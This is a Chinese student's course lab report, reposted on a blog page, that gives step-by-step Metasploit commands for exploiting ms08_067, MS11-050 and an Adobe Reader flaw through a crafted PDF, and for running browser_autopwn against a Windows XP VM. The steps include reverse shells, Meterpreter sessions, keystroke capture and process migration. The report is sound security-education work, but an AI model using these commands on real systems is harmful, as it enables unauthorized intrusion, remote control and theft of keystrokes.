20145227鄢曼君《网络对抗》MSF基础应用

最新推荐文章于 2024-09-15 14:50:06 发布
最新推荐文章于 2024-09-15 14:50:06 发布
阅读量85 收藏
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/m3182218/p/6700857.html
版权

20145227鄢曼君《网络对抗》MSF基础应用

主动攻击:ms08_067漏洞攻击实践

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。在VMware中设置两台虚拟机网络为NAT模式,让两台虚拟机ping通。
  • 在kali终端中开启msfconsole。
  • 输入命令search ms08_067,会显示出找到的渗透模块:

887843-20170413221521986-1252701221.png

  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
  • 输入命令show payloads会显示出有效的攻击载荷,我们找到一个shell_reverse_tcp。

887843-20170413221745736-956200315.png

  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
  • 输入命令set LHOST "kali Ip" set RHOST "Win xp Ip"

887843-20170413222005001-1765017775.png

  • 使用命令show options查看payload状态。

887843-20170413222108798-510279440.png

  • 输入命令exploit开始攻击,攻击成功。

887843-20170413222242923-567455861.png

  • 在kali上执行ipconfig/all得到如下图所示:

887843-20170413222324783-1995867165.png

  • 在win xp上执行同样的命令,如下图所示:

887843-20170413222344158-609422946.png

  • 可以发现二者结果相同,说明成功攻击。
  • 还可以进行MS08_067远程漏洞攻击实践:meterpreter
  • 前面都和上面的步骤相同。设置payload:set payload windows/meterpreter/reverse_tcp
  • 输入命令exploit开始攻击,攻击成功。

887843-20170413222430064-1735579658.png

对浏览器攻击:MS11_050漏洞渗透攻击实践

  • 两台虚拟机相互ping通。
  • kali中开启msfconsole。由于这次做的是ms11_050漏洞攻击,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用该模块;info即可查看关于该漏洞的信息

887843-20170413214439267-1751053288.png

  • 设置相关信息:

887843-20170413214613689-1593632135.png

  • show options查看设置好的相关信息:

887843-20170414213411642-1452526623.png

  • exploit,靶机访问的ip地址如图:

887843-20170414213646689-1529223696.png

  • 在靶机IE上输入网址,并在靶机上查看信息。

887843-20170414213719876-437597458.png

  • 查看kali,显示一个session 1已经创建:

887843-20170414213912158-341838010.png

  • 输入命令sessions -i 1,开始连接:

887843-20170414213953611-908936855.png

  • 攻击成功。可以进行一些操作,比如获取shell

887843-20170414214113517-2100054290.png

  • 或者进行按键抓取:

887843-20170414214149314-390855678.png

Adobe阅读器渗透攻击

  • kali下打开显示隐藏文件。
  • 在kali终端中开启msfconsole
  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
  • 设置相关数据:

887843-20170414222804626-606825926.png

  • 使用命令show options,看是否设置成功。

887843-20170414224335798-1599007765.png

  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

887843-20170414224402251-1616476601.png

  • 使用back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
  • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。注意的是,这里需要输入命令set LPORT 5227和攻击模块里的数据设置为一样的。
  • 使用命令exploit开始攻击,在xp中打开pdf。攻击成功结果如下图:

887843-20170414231747470-1558057252.png

  • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示:

887843-20170414231849876-1345574395.png

  • 使用命令migrate 296 成功后输入shell,可查看xp靶机信息。还可进行一些操作。

887843-20170414231952173-272502608.png

  • 在靶机xp中使用命令netstat -an,看本地tcp连接。发现成功连接。

887843-20170414232100064-587011354.png

辅助模块应用:使用浏览器渗透攻击server/browser_autopwn 模块

  • browser_autopwn 是 Metasploit 提供的辅助功能模块。在用户访问 Web 页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn 能够检测用户使用的浏览器类型,根据浏览器的检测结果,自行部署最合适的 exploit。
  • 这是针对浏览器程序本身的渗透攻击,主要利用浏览器本身的漏洞,如 IE 浏览器,经常由于自身安全漏洞导致攻击者能够构造恶意网页进行渗透攻击。
  • 打开终端窗口,启动msfconsole,选择 server/browser——autopwn 模块,配置 LHOST、 SRVHOST 为主控端 IP,设置 URIPATH 为 auto。最后运行run

887843-20170413210842955-365575904.png

  • 之后 metasploit 会自动生成利用浏览器本身的一些典型漏洞的网页,此处生成了 20 个。

887843-20170413210955939-400288618.png

887843-20170414215555814-1885873716.png

  • 攻击成功。查看检测结果,可以看到kali向靶机发送了很多数据包,用于检测该漏洞是否能利用,实际上靶机是打开了很多个网页,访问了产生的20个页面。

887843-20170414215945939-84997996.png

  • 可以进行一些操作:

887843-20170414220435158-1219247920.png

  • 或者执行ipconfig命令:

887843-20170414220623392-1786838640.png

问题回答

用自己的话解释什么是exploit,payload,encode.
  • exploit就相当于是一个运载的工具,将负责攻击的代码传送到靶机中。
  • payload也就是负责攻击的代码,之前我们实验就做过。
  • encode也就是编码,它主要有两个功能,一是为了避免之前的payload中出现坏字符,二就是它要伪装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

实验体会

  • 这次实验最大的感受就是电脑有一个大的内存条是多么重要。之前做的时候同时开两个虚拟机电脑卡的要死,做一晚上只能做一点点,时间都浪费在等电脑反应上了。后面换了一个大的内存条,实验就很顺畅了。然后这次实验老师要求至少有一个和别人不一样,我觉得这点非常好,让我们在做的过程中能更多的去思考,而不是完全照着别人的过一遍而不思考。还有一个感受就是我们这次实验攻击的靶机都是xp系统,漏洞都是很早之前的,要想攻击现在的电脑可就没有这么容易了。有点期待下一周的任务了,又会有什么不一样的呢?

转载于:https://www.cnblogs.com/m3182218/p/6700857.html

weixin_30838921
关注
网络安全】MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2904
内网渗透超级强悍
Exp6 MSF应用基础
cyuyan3hao的博客
05-06 2222
1 一个主动攻击实践 使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞介绍 在微软官方的漏洞库中
MSF基础--show options
Ethan024的博客
07-03 2492
back回到上一级 search查找某个特定的渗透攻击,辅助或是攻击载荷模块 例如,使用命令搜索MS08-067漏洞(远程过程调用[RPC]服务的一个弱点)相关的模块: 使用use命令加载找到的模块: 使用show options显示ms08-67模块所需参数: ...
MSF基础--info/show targets
Ethan024的博客
07-03 1760
show targets列出受到漏洞影响目标系统的类型: info windows/smb/ms08_067_netapi显示该模块的详细信息,参数说明以及可用的目标操作系统
MSF基础--show payloads
Ethan024的博客
07-03 1756
show payloads显示所有的攻击载荷(近600条): 例如,以MS08-067漏洞为例,查看其payloads(约150条): 输入set payload windows/shell/reverse_tcp以选择reverse_tcp(反弹式tcp连接)攻击载荷: 输入show options会看到额外的参数: 在反弹式攻击载荷中,连接是由目标主机发起的,并且其连接对象是攻击机。因此可以利用这种技术穿透防火墙或NAT网关。 ...
MSF基础应用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-19 4696
什么是MSF? Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。 MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。 MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。因此MSF的更新使用k
MSF基础
懂进攻知防守
04-30 1794
本章记录的是MSF基础命令,供学习使用!
内网渗透 Metasploit(MSF基础使用
热门推荐
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
Metasploit Framework(MSF基础框架
weixin_51151498的博客
02-12 3441
MSF使用
Metasploit(MSF)基础超级详细版
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
通信与网络中的MSF基于组件的业务框架
11-14
**MSF基于组件的业务框架概述** ...总结来说,MSF基于组件的业务框架提供了一种结构化的方法来设计和实施通信与网络服务,通过模块化和标准化,使得业务开发更加高效,同时也为未来的业务创新和升级提供了强大的基础
元器件应用中的MSF系列MSF7907L集成电路实用检测数据
11-20
MSF7907L是一款专门用于提供稳定-7伏特电源的集成电路,它在电子设备中的应用至关重要,特别是对于确保电路中各个组件能够获得精确、稳定的电压输入。这款芯片采用了3脚单列直插式塑料封装,设计紧凑,便于在电路板...
元器件应用中的MSF系列MSF7905集成电路实用检测数据
11-20
在元器件应用中,MSF7905因其高效能和稳定性而广泛被采用,特别是在索尼MDP-U3/D3型VCD影碟机的电路中,作为IC701的一部分发挥着关键作用。 在实际应用中,MSF7905的性能检测至关重要,以确保其正常工作并提供可靠...
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 385
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
4.网络编程
weixin_45476535的博客
09-14 456
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
【Linux】:信号与信号产生
Yikefore的博客
09-12 916
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
Linux入门——“Linux基本指令”上
2301_79972085的博客
09-14 814
在刚开始学习Linux时,首先需要掌握一些基本指令,以便我们能更好地使用Linux操作系统,以下指令在Ubuntu 22上执行。以下内容不过多介绍选项内容。
Linux入门1
最新发布
m0_62770407的博客
09-15 760
Linux的内核源码开源,所以只需要在内核的基础上加入内核程序就能形成一个完美可用的“操作系统”。虚拟机的名字密码根据自己喜好设置即可,接下来我将虚拟机放到了D盘中,大小根据需求,接下来直接点击下一步即可。第一种是绝对路径,第二种是在。当不使用选项和参数,直接使用ls命令本体,表示:以平铺形式,列出当前工作目录下的内容。不同的发行版在Linux的基础部分都是相同的,本教程是以常用的CentOS为例展开。当Linux终端(命令行)打开的时候,会默认以用户的HOME目录作为当前的工作目录。
MSF基础与团队模型详解:原则、应用与CMMI比较
在实际课程中,MSF的培训通常会通过案例研究、讨论和实践活动来深入讲解这些概念,并鼓励参与者将理论应用到实际工作中。通过讨论,学员可以理解一个优秀的项目团队应具备的特点,如良好的沟通、明确的目标导向、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值